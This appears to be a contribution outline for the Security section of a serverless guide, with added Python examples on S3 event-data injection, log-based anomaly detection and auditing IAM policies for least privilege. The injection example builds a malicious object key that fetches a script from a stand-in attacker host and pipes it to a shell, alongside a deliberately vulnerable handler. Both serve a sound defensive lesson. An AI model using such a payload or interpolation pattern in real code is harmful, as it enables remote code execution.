Some suggested ideas and guidance for content in this section:
Security
How is security different in the serverless world?
Are there new concerns and challenges?
Are the existing best practices for security for cloud workloads still relevant?
Does relying on external auth providers mean giving up control?
How are data compliance and governance managed against company security policies?
Positives being Serverless
Not managing infrastructure is a major positive: the provider patches the OS, kernel and language runtime, so vulnerabilities at those layers are not yours to deal with (your own code and its dependencies still are).
Endpoint protection / application whitelisting - host-based agents cannot be installed in the provider's execution environment, so these controls do not apply as such; protection has to move into the application layer.
Network-wide monitoring and perimeter appliances - there is no network of your own to watch; only where functions are attached to a VPC do security groups and flow logs still apply.
DDoS - volumetric attacks on the API Gateway endpoint are absorbed by the provider, but a flood of events is still a flood of billed invocations ("denial of wallet"), so throttling and concurrency limits remain your responsibility.
Surface Area
Surface area for attack
The surface area of a single function may seem small, but the proliferation of functions, each with its own triggers, permissions and dependencies, increases the overall surface area of attack.
Security distributed across functions
That is a positive in that a compromise is contained to one function, but one badly configured function with broad permissions can spoil it for all. Access control / least privilege is of the utmost importance.
Do short execution times reduce exposure?
There is less time to sniff data off a running function, but execution environments are reused between invocations, so secrets left in memory or in /tmp can outlive a single invocation.
Traditional host backdoors (a persistent process on a server) are not relevant, since there is no long-lived host; persistence moves to the control plane instead (modified function code, added triggers, new IAM users or access keys).
Data Sharing
How is data shared in a stateless environment?
How is data isolated?
How can data be compromised in transit?
Integrations
How do integrations with Auth services and providers work?
Examples of auth providers: Auth0, Cognito
Application Vulnerabilities
Injection (OWASP Top 10) and event-data injection: input arrives not only over HTTP but through S3 object names, queue messages and other event sources, and all of it needs validation (file names included); XSRF/CSRF on HTTP endpoints; logging sensitive information
Attacks affecting the deployment (tampered artifacts), man-in-the-middle attacks
When an attacker compromises a function, what they can do in AWS depends on how the function role's access control/permissions are set: read or modify DynamoDB, publish via SNS (phishing email), create IAM users (persistence), create other functions, etc.
Vulnerability scanning of deployed artifacts (dependencies, node_modules, binaries, etc.)
Anomaly detection: are processes running as desired? Establish the normal behaviour of each function and compare it against observed behaviour to identify anomalies
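The event-data injection point above, as an added example (not code from the guide or from any project it names): a Lambda-style handler that resizes an uploaded image by shelling out. The S3 event is constructed, and "convert" stands in for any tool a handler might invoke. The vulnerable variant interpolates the object key into a shell string; the hardened variant allow-lists the key and passes an argv list so no shell ever parses it.

```python
"""Event-data injection in a Lambda-style S3 handler (added example)."""
import re
import subprocess
from urllib.parse import unquote_plus


def make_event(key):
    """Constructed S3 PutObject notification carrying the given object key."""
    return {"Records": [{"s3": {"bucket": {"name": "uploads"},
                                "object": {"key": key}}}]}


def s3_key(event):
    # S3 URL-encodes keys in notifications; handlers decode before use,
    # so the encoding is not a filter the attacker has to get past.
    return unquote_plus(event["Records"][0]["s3"]["object"]["key"])


def vulnerable_command(event):
    """The insecure pattern: attacker-controlled key interpolated into a
    shell string.  Returned, never executed, so the payload is visible."""
    key = s3_key(event)
    return f"convert /tmp/{key} -resize 50% /tmp/thumb-{key}"


# Allow-list for object keys: a single plain filename, no shell metacharacters.
SAFE_KEY = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,254}")


def validate_key(key):
    """Reject anything that is not a plain filename (path traversal included)."""
    if ".." in key or not SAFE_KEY.fullmatch(key):
        raise ValueError(f"rejected object key: {key!r}")
    return key


def hardened_argv(event):
    """Validated key plus an argv list: no shell ever parses the key."""
    key = validate_key(s3_key(event))
    return ["convert", f"/tmp/{key}", "-resize", "50%", f"/tmp/thumb-{key}"]


def handler(event, context=None, run=subprocess.run):
    """Hardened handler.  `run` is injectable so the flow can be exercised
    on a machine without ImageMagick installed."""
    argv = hardened_argv(event)
    run(argv, check=True, shell=False)
    return {"processed": argv[1]}


# Constructed attack: the uploaded object's key carries a command; '+' decodes
# to a space, so the key reads "photo.jpg;curl http://attacker.example/x|sh".
MALICIOUS_EVENT = make_event("photo.jpg;curl+http://attacker.example/x|sh")
```

Note what the allow-list buys: the hardened handler rejects the malicious key outright rather than trying to escape it, and because the argv list never passes through a shell, even a key that slipped past validation could not chain a second command.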
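The anomaly detection point, as an added example (not from the guide): a baseline of a function's normal duration and memory use built from its CloudWatch REPORT lines, with invocations far above the baseline flagged. The log lines are constructed to the shape CloudWatch Logs emits per invocation; the threshold (median plus k times the median absolute deviation) is one reasonable choice, not something the page prescribes.

```python
"""Baseline-and-deviation anomaly detection over Lambda REPORT lines (added example)."""
import re
from statistics import median

# Constructed sample: eight ordinary invocations and one (req-09) that ran
# roughly 70x longer and used far more memory, the footprint of e.g. a
# compromised function mining or exfiltrating data.
LOG_LINES = [
    "START RequestId: req-01 Version: $LATEST",
    "REPORT RequestId: req-01 Duration: 41.2 ms Billed Duration: 42 ms Memory Size: 256 MB Max Memory Used: 71 MB",
    "REPORT RequestId: req-02 Duration: 39.8 ms Billed Duration: 40 ms Memory Size: 256 MB Max Memory Used: 69 MB",
    "REPORT RequestId: req-03 Duration: 44.1 ms Billed Duration: 45 ms Memory Size: 256 MB Max Memory Used: 73 MB",
    "REPORT RequestId: req-04 Duration: 40.5 ms Billed Duration: 41 ms Memory Size: 256 MB Max Memory Used: 70 MB",
    "REPORT RequestId: req-05 Duration: 43.3 ms Billed Duration: 44 ms Memory Size: 256 MB Max Memory Used: 72 MB",
    "REPORT RequestId: req-06 Duration: 38.9 ms Billed Duration: 39 ms Memory Size: 256 MB Max Memory Used: 68 MB",
    "REPORT RequestId: req-07 Duration: 42.7 ms Billed Duration: 43 ms Memory Size: 256 MB Max Memory Used: 74 MB",
    "REPORT RequestId: req-08 Duration: 41.9 ms Billed Duration: 42 ms Memory Size: 256 MB Max Memory Used: 71 MB",
    "REPORT RequestId: req-09 Duration: 2890.7 ms Billed Duration: 2891 ms Memory Size: 256 MB Max Memory Used: 188 MB",
    "END RequestId: req-09",
]

REPORT_RE = re.compile(
    r"REPORT RequestId: (?P<rid>\S+)\s+Duration: (?P<dur>[\d.]+) ms"
    r".*?Max Memory Used: (?P<mem>\d+) MB"
)


def parse_reports(lines):
    """Keep only REPORT lines; START/END lines carry no metrics."""
    reports = []
    for line in lines:
        m = REPORT_RE.search(line)
        if m:
            reports.append({"request_id": m["rid"],
                            "duration_ms": float(m["dur"]),
                            "memory_mb": int(m["mem"])})
    return reports


def baseline(reports, field):
    """Median and median absolute deviation: robust to the very outliers we hunt."""
    values = [r[field] for r in reports]
    med = median(values)
    mad = median([abs(v - med) for v in values])
    return med, mad


def find_anomalies(reports, field="duration_ms", k=6.0, floor=1.0):
    """Flag invocations more than k*MAD above the median.  `floor` stops a
    near-zero MAD from flagging ordinary jitter."""
    med, mad = baseline(reports, field)
    threshold = med + k * max(mad, floor)
    return [r["request_id"] for r in reports if r[field] > threshold]


def run_detection(lines):
    """Request ids that are anomalous on duration and on memory."""
    reports = parse_reports(lines)
    return {"duration": find_anomalies(reports, "duration_ms"),
            "memory": find_anomalies(reports, "memory_mb")}
```

On this sample only req-09 is flagged on both axes. A cold start would also land well above the duration threshold, so in practice warm and cold invocations are baselined separately, and the same median/MAD logic can be applied to other per-invocation signals (bytes sent, hosts contacted) once they are logged.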
Access Management
Access Control groups and permission sets
Role-based access (IAM roles)
What about other provider-specific roles?
Vendor Specific
How does this translate to the Framework? Does it make it easier to manage? PureSec security plugin
Automatic setting of least privileged IAM roles/permissions
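The least-privilege point, raised above under Surface Area (one over-permissioned function spoils it for all), under Application Vulnerabilities (what a compromised function can reach depends on its role) and here, as an added example that is not from the guide and is not the PureSec plugin: an audit of a function role's IAM policy that flags wildcard actions, Resource "*", and actions that let a compromised function persist or escalate. Both policies are constructed, the persistence/escalation action list is illustrative rather than complete, and the statement objects are the same shape as entries under provider.iamRoleStatements in serverless.yml.

```python
"""Least-privilege audit of an IAM policy for a function role (added example)."""

# Actions that let a compromised function persist or escalate rather than
# just read data: create users/keys, attach policies, deploy new code.
# Illustrative, not a complete catalogue.
PERSISTENCE_ACTIONS = {
    "iam:createuser", "iam:createaccesskey", "iam:putuserpolicy",
    "iam:attachuserpolicy", "iam:attachrolepolicy", "iam:passrole",
    "iam:updateassumerolepolicy", "lambda:createfunction",
    "lambda:updatefunctioncode", "lambda:addpermission", "sts:assumerole",
}

# Actions with no resource-level scoping, for which '*' is the only option.
RESOURCELESS_OK = {"xray:puttracesegments", "xray:puttelemetryrecords"}


def _as_list(value):
    # IAM accepts a single string or a list for Statement/Action/Resource.
    return value if isinstance(value, list) else [value]


def audit_policy(policy):
    """Return one finding string per over-broad grant; empty means clean."""
    findings = []
    for i, stmt in enumerate(_as_list(policy.get("Statement", []))):
        if stmt.get("Effect") != "Allow":
            continue
        if "NotAction" in stmt or "NotResource" in stmt:
            findings.append(f"stmt {i}: NotAction/NotResource allows everything not listed")
        actions = [a.lower() for a in _as_list(stmt.get("Action", []))]
        resources = _as_list(stmt.get("Resource", []))
        for action in actions:
            if action == "*" or action.endswith(":*"):
                findings.append(f"stmt {i}: wildcard action {action!r}")
            elif action in PERSISTENCE_ACTIONS:
                findings.append(f"stmt {i}: persistence/escalation action {action!r}")
        if "*" in resources and not all(a in RESOURCELESS_OK for a in actions):
            findings.append(f"stmt {i}: Resource '*' for {actions}")
    return findings


def is_least_privilege(policy):
    return not audit_policy(policy)


# Constructed: the copy-pasted "just make it work" role.
OVERBROAD_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": "*", "Resource": "*"},
        {"Effect": "Allow", "Action": ["dynamodb:*", "iam:CreateUser"], "Resource": "*"},
    ],
}

# Constructed: the same function scoped to the one table and log group it uses
# (account id and names are placeholders).
SCOPED_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow",
         "Action": ["dynamodb:GetItem", "dynamodb:PutItem"],
         "Resource": "arn:aws:dynamodb:us-east-1:123456789012:table/orders"},
        {"Effect": "Allow",
         "Action": ["logs:CreateLogStream", "logs:PutLogEvents"],
         "Resource": "arn:aws:logs:us-east-1:123456789012:log-group:/aws/lambda/orders-api:*"},
        {"Effect": "Allow", "Action": ["xray:PutTraceSegments"], "Resource": "*"},
    ],
}
```

The over-broad policy yields five findings (two wildcard actions, two Resource "*" grants, and iam:CreateUser, which is exactly the user-creation persistence path mentioned above); the scoped policy yields none. A check like this belongs in the deployment pipeline so a role cannot widen without someone noticing.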
Description
Add content to the Security section of the guide.
Filename:
/guide/source/security/README.md
Page/Section: Security
Contributing Author: Shaked Zin (PureSec)
Details:
Some suggested ideas and guidance for content in this section:
Security
Positives being Serverless
Surface Area
Data Sharing
Integrations
Application Vulnerabilities
Access Management
Vendor Specific